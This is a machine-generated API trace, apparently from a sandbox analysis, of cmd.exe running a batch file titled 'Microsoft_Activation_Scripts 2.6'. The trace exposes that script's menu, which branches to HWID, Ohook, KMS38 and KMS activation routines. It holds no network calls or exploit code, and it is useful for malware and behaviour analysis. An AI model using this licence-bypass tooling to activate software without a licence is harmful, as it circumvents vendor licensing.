[0181.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 [0181.178] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb950 [0181.178] _wcsicmp (_String1="GOTO", _String2="DIR") returned 3 [0181.178] _wcsicmp (_String1="GOTO", _String2="ERASE") returned 2 [0181.178] _wcsicmp (_String1="GOTO", _String2="DEL") returned 3 [0181.178] _wcsicmp (_String1="GOTO", _String2="TYPE") returned -13 [0181.178] _wcsicmp (_String1="GOTO", _String2="COPY") returned 4 [0181.178] _wcsicmp (_String1="GOTO", _String2="CD") returned 4 [0181.178] _wcsicmp (_String1="GOTO", _String2="CHDIR") returned 4 [0181.178] _wcsicmp (_String1="GOTO", _String2="RENAME") returned -11 [0181.178] _wcsicmp (_String1="GOTO", _String2="REN") returned -11 [0181.178] _wcsicmp (_String1="GOTO", _String2="ECHO") returned 2 [0181.178] _wcsicmp (_String1="GOTO", _String2="SET") returned -12 [0181.178] _wcsicmp (_String1="GOTO", _String2="PAUSE") returned -9 [0181.178] _wcsicmp (_String1="GOTO", _String2="DATE") returned 3 [0181.178] _wcsicmp (_String1="GOTO", _String2="TIME") returned -13 [0181.178] _wcsicmp (_String1="GOTO", _String2="PROMPT") returned -9 [0181.178] _wcsicmp (_String1="GOTO", _String2="MD") returned -6 [0181.178] _wcsicmp (_String1="GOTO", _String2="MKDIR") returned -6 [0181.178] _wcsicmp (_String1="GOTO", _String2="RD") returned -11 [0181.178] _wcsicmp (_String1="GOTO", _String2="RMDIR") returned -11 [0181.178] _wcsicmp (_String1="GOTO", _String2="PATH") returned -9 [0181.178] _wcsicmp (_String1="GOTO", _String2="GOTO") returned 0 [0181.178] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe620, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.179] _wcsicmp (_String1="GOTO", _String2="DIR") returned 3 [0181.179] _wcsicmp (_String1="GOTO", _String2="ERASE") returned 2 [0181.179] _wcsicmp (_String1="GOTO", _String2="DEL") returned 3 [0181.179] _wcsicmp (_String1="GOTO", _String2="TYPE") returned -13 [0181.179] _wcsicmp (_String1="GOTO", _String2="COPY") returned 4 [0181.179] _wcsicmp (_String1="GOTO", _String2="CD") returned 4 [0181.179] _wcsicmp (_String1="GOTO", _String2="CHDIR") returned 4 [0181.179] _wcsicmp (_String1="GOTO", _String2="RENAME") returned -11 [0181.179] _wcsicmp (_String1="GOTO", _String2="REN") returned -11 [0181.179] _wcsicmp (_String1="GOTO", _String2="ECHO") returned 2 [0181.179] _wcsicmp (_String1="GOTO", _String2="SET") returned -12 [0181.179] _wcsicmp (_String1="GOTO", _String2="PAUSE") returned -9 [0181.179] _wcsicmp (_String1="GOTO", _String2="DATE") returned 3 [0181.179] _wcsicmp (_String1="GOTO", _String2="TIME") returned -13 [0181.179] _wcsicmp (_String1="GOTO", _String2="PROMPT") returned -9 [0181.179] _wcsicmp (_String1="GOTO", _String2="MD") returned -6 [0181.179] _wcsicmp (_String1="GOTO", _String2="MKDIR") returned -6 [0181.179] _wcsicmp (_String1="GOTO", _String2="RD") returned -11 [0181.179] _wcsicmp (_String1="GOTO", _String2="RMDIR") returned -11 [0181.179] _wcsicmp (_String1="GOTO", _String2="PATH") returned -9 [0181.179] _wcsicmp (_String1="GOTO", _String2="GOTO") returned 0 [0181.179] GetProcessHeap () returned 0x19a8f1e0000 [0181.179] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0c70 [0181.180] GetProcessHeap () returned 0x19a8f1e0000 [0181.180] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0c70, Size=0x22) returned 0x19a8f1eb710 [0181.180] GetProcessHeap () returned 0x19a8f1e0000 [0181.180] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb710) returned 0x22 [0181.180] GetProcessHeap () returned 0x19a8f1e0000 [0181.180] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2c) returned 0x19a8f1e0bb0 [0181.180] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe0b0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0181.180] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0181.180] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.180] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10090, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x276a [0181.180] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.180] GetFileSize (in: hFile=0x9c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d9ee [0181.180] _wcsnicmp (_String1="_col", _String2=":EOF", _MaxCount=0x4) returned 37 [0181.180] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.180] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x276a [0181.180] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.180] GetFileType (hFile=0x9c) returned 0x1 [0181.180] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x276a [0181.180] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10114, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2782 [0181.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:123456780 /N\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="choice /C:123456780 /N\r\n \" \"40;92m\" \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"") returned 24 [0181.181] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2782 [0181.181] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.181] GetFileType (hFile=0x9c) returned 0x1 [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2782 [0181.181] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10137, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2799 [0181.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _erl=%errorlevel%\r\n", cbMultiByte=23, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _erl=%errorlevel%\r\n\n") returned 23 [0181.181] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2799 [0181.181] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.181] GetFileType (hFile=0x9c) returned 0x1 [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2799 [0181.181] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10139, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x279b [0181.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _erl=%errorlevel%\r\n") returned 2 [0181.181] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279b [0181.181] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.181] GetFileType (hFile=0x9c) returned 0x1 [0181.181] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279b [0181.182] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10161, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x27b1 [0181.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==9 exit /b\r\n", cbMultiByte=22, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==9 exit /b\r\n\n") returned 22 [0181.182] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27b1 [0181.182] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.182] GetFileType (hFile=0x9c) returned 0x1 [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27b1 [0181.182] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10221, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x27ed [0181.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==8 start %mas%troubleshoot.html & goto :MainMenu\r\n", cbMultiByte=60, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==8 start %mas%troubleshoot.html & goto :MainMenu\r\nn in the Keyboard [1,2,3,4,5,6,7,8,0] :\"") returned 60 [0181.182] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27ed [0181.182] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.182] GetFileType (hFile=0x9c) returned 0x1 [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x27ed [0181.182] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2807 [0181.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==7 goto:Extras\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==7 goto:Extras\r\noubleshoot.html & goto :MainMenu\r\n") returned 26 [0181.182] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.182] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2807 [0181.183] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.183] GetFileType (hFile=0x9c) returned 0x1 [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2807 [0181.183] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10330, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x285a [0181.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==6 setlocal & call :troubleshoot & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==6 setlocal & call :troubleshoot & cls & endlocal & goto :MainMenu\r\n3,4,5,6,7,8,0] :\"") returned 83 [0181.183] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x285a [0181.183] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.183] GetFileType (hFile=0x9c) returned 0x1 [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x285a [0181.183] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10413, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x28ad [0181.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==5 setlocal & call :_Check_Status_wmi & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==5 setlocal & call :_Check_Status_wmi & cls & endlocal & goto :MainMenu\r\n") returned 83 [0181.183] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x28ad [0181.183] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.183] GetFileType (hFile=0x9c) returned 0x1 [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x28ad [0181.183] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.183] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10496, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2900 [0181.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==4 setlocal & call :KMSActivation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==4 setlocal & call :KMSActivation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0181.184] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2900 [0181.184] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.184] GetFileType (hFile=0x9c) returned 0x1 [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2900 [0181.184] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10579, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2953 [0181.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==3 setlocal & call :KMS38Activation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==3 setlocal & call :KMS38Activation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0181.184] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2953 [0181.184] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.184] GetFileType (hFile=0x9c) returned 0x1 [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2953 [0181.184] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29a6 [0181.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==2 setlocal & call :OhookActivation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==2 setlocal & call :OhookActivation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0181.184] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29a6 [0181.184] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.184] GetFileType (hFile=0x9c) returned 0x1 [0181.184] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29a6 [0181.185] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10745, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29f9 [0181.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==1 setlocal & call :HWIDActivation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==1 setlocal & call :HWIDActivation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0181.185] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29f9 [0181.185] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.185] GetFileType (hFile=0x9c) returned 0x1 [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29f9 [0181.185] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10761, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2a09 [0181.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto :MainMenu\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto :MainMenu\r\nlocal & call :HWIDActivation & cls & endlocal & goto :MainMenu\r\n") returned 16 [0181.185] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a09 [0181.185] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.185] GetFileType (hFile=0x9c) returned 0x1 [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a09 [0181.185] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10763, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2a0b [0181.185] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nto :MainMenu\r\n") returned 2 [0181.185] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.185] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a0b [0181.186] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.186] GetFileType (hFile=0x9c) returned 0x1 [0181.186] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a0b [0181.186] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.186] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10903, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2a97 [0181.186] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n===========\r\n") returned 140 [0181.186] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.186] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.186] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a97 [0181.186] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.186] GetFileType (hFile=0x9c) returned 0x1 [0181.186] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a97 [0181.186] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.186] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10905, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2a99 [0181.186] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0181.186] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.186] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a99 [0181.186] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.186] GetFileType (hFile=0x9c) returned 0x1 [0181.186] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2a99 [0181.186] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.187] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10914, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa2 [0181.187] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":Extras\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":Extras\r\n=================================================================================================================================\r\n") returned 9 [0181.187] _wcsicmp (_String1="_color2", _String2="Extras") returned -6 [0181.187] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.187] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa2 [0181.187] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.187] GetFileType (hFile=0x9c) returned 0x1 [0181.187] SetFilePointer 